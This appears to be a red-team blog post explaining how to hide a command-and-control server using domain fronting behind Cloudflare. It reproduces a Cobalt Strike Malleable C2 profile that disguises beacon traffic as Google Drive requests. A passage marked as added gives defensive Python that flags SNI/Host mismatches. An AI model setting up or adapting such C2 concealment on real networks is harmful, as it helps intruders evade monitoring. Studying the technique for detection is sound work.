title: C2 Hiding: Domain Fronting
tags: Anonymity
categories:
- RedTeam
cover: 'https://blog-1255850204.cos.ap-guangzhou.myqcloud.com/uPic/wQQKmI.png'
abbrlink: 137b
date: 2020-07-25 17:58:24
C2 Hiding via Domain Fronting (to be continued)
Introduction
During a red team engagement, if the C2 server is not protected in some way, then every command-and-control action makes the victim machine open a network connection to the C2 server. That makes it easy to trace the traffic back to the real IP, the C2 server is exposed, and further action becomes difficult.
Domain fronting
Domain fronting (also translated into Chinese as 域名幌子) is a technique that hides the real endpoint of a connection in order to circumvent Internet censorship. Operating at the application layer, domain fronting lets a user connect over HTTPS to a blocked service while appearing on the surface to be talking to a completely different site.
Domain fronting is a censorship-circumvention technique whose main purpose is to conceal the remote endpoint of a communication. It takes place at the application layer and relies mainly on the HTTPS protocol. The remote endpoint would normally be blocked, but with domain fronting the inspecting device is led to believe the traffic is bound for some other legitimate address, so the check is bypassed. The core idea is to use different domain names at different communication layers. Within a single HTTPS request, the outer layer uses one domain name (the DNS query and the TLS SNI, Server Name Indication), while the inner layer uses another (the HTTP Host header); because the Host header sits under TLS encryption, it is invisible to the inspecting device.
Here I borrow a diagram from a well-known researcher:
Domain fronting can be done behind high-reputation domains such as Google or Microsoft; here I only do a simple hands-on exercise.
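As an added, defender-side example that is not code from the original post, the following Python flags proxy log lines whose TLS SNI and decrypted HTTP Host header fall under different registrable domains, which is exactly the cross-layer mismatch the technique depends on. The log format, field names and sample lines are constructed assumptions, not any real product's output.

```python
# Added example (not from the original post): flag TLS sessions whose
# outer name (DNS / TLS SNI) and inner name (HTTP Host header) disagree.
# Domain fronting relies on that disagreement, so a TLS-inspecting proxy
# that logs both fields can surface it. The log format is constructed.
import re
from dataclasses import dataclass

# Constructed sample of what a TLS-terminating proxy might log: one line per
# request with the SNI from the ClientHello and the Host header seen after
# decryption. Field names are assumptions, not a real product's format.
SAMPLE_LOG = """\
ts=1595671104 src=10.0.0.12 sni=www.example-cdn.net host=www.example-cdn.net uri=/index.html
ts=1595671110 src=10.0.0.12 sni=cdn-front.example.net host=c2.example.org uri=/viewerng/meta
ts=1595671115 src=10.0.0.13 sni=static.example.com host=assets.example.com uri=/app.js
ts=1595671120 src=10.0.0.14 sni=drive.google.com host=drive.google.com uri=/viewerng/meta
"""

LINE_RE = re.compile(r"sni=(?P<sni>\S+)\s+host=(?P<host>\S+)")


@dataclass
class Finding:
    sni: str
    host: str
    line: str


def registrable_domain(name: str) -> str:
    """Crude eTLD+1: the last two labels. Enough for the demo; a real
    deployment would use the Public Suffix List."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def find_fronting_candidates(log_text: str) -> list[Finding]:
    """Return lines whose SNI and Host header belong to different
    registrable domains. Same-domain differences (www vs static) are
    normal CDN behaviour and are not flagged."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        sni, host = m["sni"], m["host"]
        if registrable_domain(sni) != registrable_domain(host):
            findings.append(Finding(sni, host, line))
    return findings


if __name__ == "__main__":
    for f in find_fronting_candidates(SAMPLE_LOG):
        print(f"SNI/Host mismatch: sni={f.sni} host={f.host}")
```

Only the second constructed line is flagged; the www/static pair on the third line shares a registrable domain and is treated as ordinary CDN traffic.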
Preparation
- A C2 domain
- A Cloudflare account
-
Domain configuration
Buy a domain on GoDaddy and point its NS servers at Cloudflare's addresses so that Cloudflare handles resolution.
- Set the corresponding A record in Cloudflare
- Adjust the caching configuration in Cloudflare: turn off Development Mode and caching
- Configure the C2 profile
There is a collection compiled by harmj0y at https://github.com/rsmudge/Malleable-C2-Profiles; it contains a Google profile to use as a reference:
#
# Google Drive
#
# Author: @bluscreenofjeff
#

# set https cert info
https-certificate {
    set CN "*.google.com";        # Common Name
    set O "Google Inc";           # Organization Name
    set C "US";                   # Country
    set L "Mountain View";        # Locality
    set ST "California";          # State or Province
    set validity "365";           # Number of days the cert is valid for
}

# default Beacon sleep duration and jitter
set sleeptime "60000";
set jitter "20";

# default useragent for HTTP comms
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

# IP address used to indicate no tasks are available to DNS Beacon
set dns_idle "8.8.4.4";
# Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";
# Maximum length of hostname when uploading data over DNS (0-255)
set maxdns "235";

http-get {
    set uri "/viewerng/meta";

    client {
        header "Accept" "text/html,application/xml;*/*;";
        header "Accept-Encoding" "gzip, deflate";
        header "Host" "drive.google.com";
        header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

        # session metadata
        metadata {
            base64url;
            netbios;
            base64url;
            parameter "id";
        }

        parameter "u" "0";
    }

    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
        header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
        header "X-Content-Type-Options" "nosniff";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-XSS-Protection" "1; mode=block";
        header "Server" "GSE";
        header "Connection" "close";

        # Beacon's tasks
        output {
            print;
        }
    }
}

http-post {
    set uri "/viewersng/meta";
    set verb "GET";

    client {
        header "Accept" "text/html,application/xml;*/*;";
        header "Accept-Encoding" "gzip, deflate";
        header "Host" "drive.google.com";
        header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

        output {
            base64url;
            netbios;
            base64url;
            parameter "id";
        }

        # session ID
        id {
            parameter "u";
        }
    }

    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
        header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
        header "X-Content-Type-Options" "nosniff";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-XSS-Protection" "1; mode=block";
        header "Server" "GSE";
        header "Connection" "close";

        output {
            print;
        }
    }
}

# change the stager server
http-stager {
    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
    }
}